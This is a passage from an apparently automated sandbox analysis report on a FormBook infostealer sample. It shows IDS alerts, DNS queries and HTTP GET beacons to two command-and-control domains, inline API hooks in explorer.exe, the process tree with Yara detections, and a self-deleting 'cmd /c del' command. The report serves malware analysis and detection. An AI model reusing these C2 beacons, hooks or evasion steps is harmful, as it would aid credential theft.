                  RT_STRING0x81fe40x146dataEnglishUnited States
                  RT_STRING0x8212c0x46cdataEnglishUnited States
                  RT_STRING0x825980x166dataEnglishUnited States
                  RT_STRING0x827000x152dataEnglishUnited States
                  RT_STRING0x828540x10adataEnglishUnited States
                  RT_STRING0x829600xbcdataEnglishUnited States
                  RT_STRING0x82a1c0xd6dataEnglishUnited States
                  RT_GROUP_ICON0x82af40x4cdataEnglishUnited States
                  RT_MANIFEST0x82b400x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                  DLLImport
                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.3103.224.212.22149708802031412 10/03/22-16:00:41.738205TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970880192.168.2.3103.224.212.221
                  192.168.2.3103.224.212.22149708802031449 10/03/22-16:00:41.738205TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970880192.168.2.3103.224.212.221
                  192.168.2.3103.224.212.22149708802031453 10/03/22-16:00:41.738205TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970880192.168.2.3103.224.212.221
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 3, 2022 16:00:18.956696987 CEST4970780192.168.2.35.101.152.161
                  Oct 3, 2022 16:00:19.028978109 CEST80497075.101.152.161192.168.2.3
                  Oct 3, 2022 16:00:19.029166937 CEST4970780192.168.2.35.101.152.161
                  Oct 3, 2022 16:00:19.045396090 CEST4970780192.168.2.35.101.152.161
                  Oct 3, 2022 16:00:19.116703987 CEST80497075.101.152.161192.168.2.3
                  Oct 3, 2022 16:00:19.127684116 CEST80497075.101.152.161192.168.2.3
                  Oct 3, 2022 16:00:19.127712011 CEST80497075.101.152.161192.168.2.3
                  Oct 3, 2022 16:00:19.127924919 CEST4970780192.168.2.35.101.152.161
                  Oct 3, 2022 16:00:19.127958059 CEST4970780192.168.2.35.101.152.161
                  Oct 3, 2022 16:00:19.201196909 CEST80497075.101.152.161192.168.2.3
                  Oct 3, 2022 16:00:41.572072029 CEST4970880192.168.2.3103.224.212.221
                  Oct 3, 2022 16:00:41.737982035 CEST8049708103.224.212.221192.168.2.3
                  Oct 3, 2022 16:00:41.738086939 CEST4970880192.168.2.3103.224.212.221
                  Oct 3, 2022 16:00:41.738204956 CEST4970880192.168.2.3103.224.212.221
                  Oct 3, 2022 16:00:41.939363003 CEST8049708103.224.212.221192.168.2.3
                  Oct 3, 2022 16:00:41.941509008 CEST4970880192.168.2.3103.224.212.221
                  Oct 3, 2022 16:00:41.941654921 CEST4970880192.168.2.3103.224.212.221
                  Oct 3, 2022 16:00:42.107552052 CEST8049708103.224.212.221192.168.2.3
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 3, 2022 16:00:18.870301008 CEST5799053192.168.2.38.8.8.8
                  Oct 3, 2022 16:00:18.944986105 CEST53579908.8.8.8192.168.2.3
                  Oct 3, 2022 16:00:41.398914099 CEST5238753192.168.2.38.8.8.8
                  Oct 3, 2022 16:00:41.570863008 CEST53523878.8.8.8192.168.2.3
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 3, 2022 16:00:18.870301008 CEST192.168.2.38.8.8.80x1a5cStandard query (0)www.nordenergogrup.storeA (IP address)IN (0x0001)false
                  Oct 3, 2022 16:00:41.398914099 CEST192.168.2.38.8.8.80x2286Standard query (0)www.sandstormcase.usA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 3, 2022 16:00:18.944986105 CEST8.8.8.8192.168.2.30x1a5cNo error (0)www.nordenergogrup.store5.101.152.161A (IP address)IN (0x0001)false
                  Oct 3, 2022 16:00:41.570863008 CEST8.8.8.8192.168.2.30x2286No error (0)www.sandstormcase.us103.224.212.221A (IP address)IN (0x0001)false
                  • www.nordenergogrup.store
                  • www.sandstormcase.us
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.3497075.101.152.16180C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 16:00:19.045396090 CEST338OUTGET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1
                  Host: www.nordenergogrup.store
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Oct 3, 2022 16:00:19.127684116 CEST339INHTTP/1.1 404 Not Found
                  Server: nginx-reuseport/1.21.1
                  Date: Mon, 03 Oct 2022 14:00:19 GMT
                  Content-Type: text/html; charset=iso-8859-1
                  Content-Length: 284
                  Connection: close
                  Vary: Accept-Encoding
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 6f 72 64 65 6e 65 72 67 6f 67 72 75 70 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.nordenergogrup.store Port 80</address></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.349708103.224.212.22180C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 16:00:41.738204956 CEST340OUTGET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1
                  Host: www.sandstormcase.us
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Oct 3, 2022 16:00:41.939363003 CEST340INHTTP/1.1 302 Found
                  Date: Mon, 03 Oct 2022 14:00:41 GMT
                  Server: Apache/2.4.38 (Debian)
                  Set-Cookie: __tad=1664805641.1466436; expires=Thu, 30-Sep-2032 14:00:41 GMT; Max-Age=315360000
                  Location: http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=UTF-8


                  Code Manipulations

                  Function NameHook TypeActive in Processes
                  PeekMessageAINLINEexplorer.exe
                  PeekMessageWINLINEexplorer.exe
                  GetMessageWINLINEexplorer.exe
                  GetMessageAINLINEexplorer.exe
                  Function NameHook TypeNew Data
                  PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6
                  PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6
                  GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6
                  GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6

                  Click to jump to process

                  Target ID:0
                  Start time:15:58:40
                  Start date:03/10/2022
                  Path:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  Imagebase:0xc60000
                  File size:577991 bytes
                  MD5 hash:633BB3AB12D6FD7B6956AA3A93F55E9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Target ID:1
                  Start time:15:58:42
                  Start date:03/10/2022
                  Path:C:\Users\user\AppData\Local\Temp\bstkiooen.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
                  Imagebase:0x1d0000
                  File size:6144 bytes
                  MD5 hash:A2AF309781DF2F75DC0B57AE63B0F3A9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 24%, ReversingLabs
                  Reputation:low

                  Target ID:2
                  Start time:15:58:43
                  Start date:03/10/2022
                  Path:C:\Users\user\AppData\Local\Temp\bstkiooen.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
                  Imagebase:0x1d0000
                  File size:6144 bytes
                  MD5 hash:A2AF309781DF2F75DC0B57AE63B0F3A9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:3
                  Start time:15:58:46
                  Start date:03/10/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff69fe90000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Target ID:13
                  Start time:15:59:35
                  Start date:03/10/2022
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\svchost.exe
                  Imagebase:0x350000
                  File size:44520 bytes
                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Target ID:14
                  Start time:15:59:38
                  Start date:03/10/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
                  Imagebase:0xb0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:15
                  Start time:15:59:38
                  Start date:03/10/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff745070000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  No disassembly